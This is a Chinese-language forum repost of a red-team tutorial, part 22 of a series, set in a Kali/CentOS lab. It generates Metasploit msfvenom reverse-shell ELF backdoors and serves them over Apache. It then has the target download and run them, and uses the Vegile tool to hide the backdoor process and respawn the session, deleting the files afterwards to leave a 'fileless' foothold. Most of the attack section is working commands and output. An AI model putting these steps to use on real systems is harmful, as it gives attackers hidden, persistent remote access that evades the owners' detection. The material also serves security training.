论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
运维.售后
›
运维.售后
›
红队/白帽必经之路(22)——实战之怎样通过Metasploit 及 ...
红队/白帽必经之路(22)——实战之怎样通过Metasploit 及Vegile 维吉尔工具 ...
汕尾海湾
金牌会员
|
2024-12-20 15:42:54
|
显示全部楼层
|
阅读模式
楼主
主题
864
|
帖子
864
|
积分
2592
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]
专栏跑道六
➡️数据布局与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
上节回顾
目次
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]编辑
专栏跑道六
➡️数据布局与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
上节回顾
1.实战-Linux 无文件木马程序
1.1环境准备
按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
再生成一个用来隐藏执行的后门
补充:
1.2启动 apache
上传 Vegile 维吉尔工具到网站目次下方便 centos 下载
注意:
1.3获取 Linux 体系的 shell
MSF 设置监听
先安装下载工具
添加执行权限
利用 sessionID 连接 centos
参数详解:
注意:
扩展:
注意:
1.4创建无文件后门程序
补充:
回到前面建立的 session 中下载用于隐藏历程的工具
解压+cd+x
下载用于隐藏执行的后门程序+x
隐藏执行后门程序
回到另一个 MSF 控制台查看 session
查看一下我们注入到了哪个历程
删除我们下载的所有文件
注意:
举例:
1.实战-Linux 无文件木马程序
1.1环境准备
Kali:192.168.1.53
Centos:192.168.1.63
按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=8080 -b "\x00" -f elf -o /var/www/html/xuegod-backdoor
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 175 (iteration=0)
x64/xor chosen with final size 175
Payload size: 175 bytes
Final size of elf file: 295 bytes
Saved as: /var/www/html/xuegod-backdoor
复制代码
再生成一个用来隐藏执行的后门
补充:
ghost 是什么意思? 还原体系?
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 175 (iteration=0)
x64/xor chosen with final size 175
Payload size: 175 bytes
Final size of elf file: 295 bytes
Saved as: /var/www/html/xuegod-ghost
复制代码
1.2启动 apache
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# systemctl start apache2
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# systemctl enable apache2 #设置开机启动,
Synchronizing state of apache2.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install enable apache2
Created symlink '/etc/systemd/system/multi-user.target.wants/apache2.service' → '/usr/lib/systemd/system/apache2.service'.
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# systemctl is-enabled apache2
enabled
复制代码
上传 Vegile 维吉尔工具到网站目次下方便 centos 下载
Vegile 官方下载链接
Vegile 常用方法:
./Vegile --i 隐藏你的后门
./Vegile --u 无穷复制你的 metasploit 会话,即使他被 kill,依然可以再次运行
注意:
木马肯定要放在 Vegile 目次下
Vegile 一样平常用于维持 meterpreter 会话
┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# cd /var/www/html/
┌──(root㉿kali-2024)-[/var/www/html]
└─# rz
复制代码
1.3获取 Linux 体系的 shell
MSF 设置监听
msf6 exploit(windows/smb/psexec) > back
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 8080 #改成8080,防止和上面实验的 4444 端
口冲突
LPORT => 8080
msf6 exploit(multi/handler) > exploit -j #在后台运行 handler,发现现在并没有 session,
因为客户端还没有执行
复制代码
到 centos 操作体系下载执行文件来建立 session,为了模拟实战结果隐藏行为通过该 session进行操作
先安装下载工具
┌──(root㉿kali-2024)-[/var/www/html]
└─# wget 192.168.1.53/xuegod-backdoor
复制代码
添加执行权限
┌──(root㉿kali-2024)-[/var/www/html]
└─# chmod +x xuegod-backdoor
复制代码
执行完成后获取到 session
┌──(root㉿kali-2024)-[/var/www/html]
└─# ./xuegod-backdoor
复制代码
利用 sessionID 连接 centos
msf6 exploit(multi/handler) > sessions -i 2
复制代码
参数详解:
-i <opt> Interact with the supplied session ID
注意:
这个 payload 中的 shell 是没有 bash 提示符的
扩展:
怎样查看我们当进步程的名字和 PID?
查看网络连接状态:
netstat -antup | grep 8080
复制代码
可以看到我们的 pid 是 2406
ps -aux | grep 2406
复制代码
查看 IP 地址,发现找不到
但是可以可以利用绝对路径
注意:
上图的 session 要保持连接,先不要断开!后期面要利用到
1.4创建无文件后门程序
补充:
新建终端窗口,MSF 控制台可以启动多个互不影响
[-] Parse error: Unmatched quote: "' use exploit/multi/handler"
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit -j
复制代码
回到前面建立的 session 中下载用于隐藏历程的工具
wget 192.168.1.53/Vegile-master.zip
复制代码
解压+cd+x
unzip Vegile-master.zip
cd Vegile-master
chmod +x Vegile
复制代码
下载用于隐藏执行的后门程序+x
wget 192.168.1.53/xuegod-ghost
chmod +x xuegod-ghost
复制代码
隐藏执行后门程序
这里是退出 Vegile,不是退出当前的 session。
回到另一个 MSF 控制台查看 session
目标端口为 52038
查看一下我们注入到了哪个历程
msf6 exploit(multi/handler) > sessions -i 3
复制代码
同样是一个 sh 历程
删除我们下载的所有文件
rm -rf /root/Vegile-master
复制代码
如遇到错误提示:
ERROR: ld.so: object '/usr/local/lib/libprocesshider.so' from/etc/ld.so.preload cannot be preloaded: ignored.
复制代码
解决方法:
echo "" > /etc/ld.so.preload # 64 位系统没有这个文件导致报错
复制代码
注意:
删除时,也会把 xuegod-ghost 这个后门程序删除了。
虽然文件被删除了,但会话,还是建立着了。
删除我们所有文件之后程序仍旧正常执行。
举例:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
汕尾海湾
金牌会员
这个人很懒什么都没写!
楼主热帖
RabbitMQ 进阶 -- 阿里云服务器部署Rab ...
一文了解袋鼠云在实时数据湖上的探索与 ...
redis实现主从复制
Spark快速上手(3)Spark核心编程-RDD转 ...
Vue 全套教程(二),入门 Vue 必知必 ...
在Ubuntu系统上安装StoneDB数据库 ...
5分钟安装Kubernetes+带你轻松安装isti ...
基于FPGA的一维卷积神经网络CNN的实现 ...
Kafka生产者
专业的C头文件设计和重构指南 ...
标签云
挺好的
服务器
快速回复
返回顶部
返回列表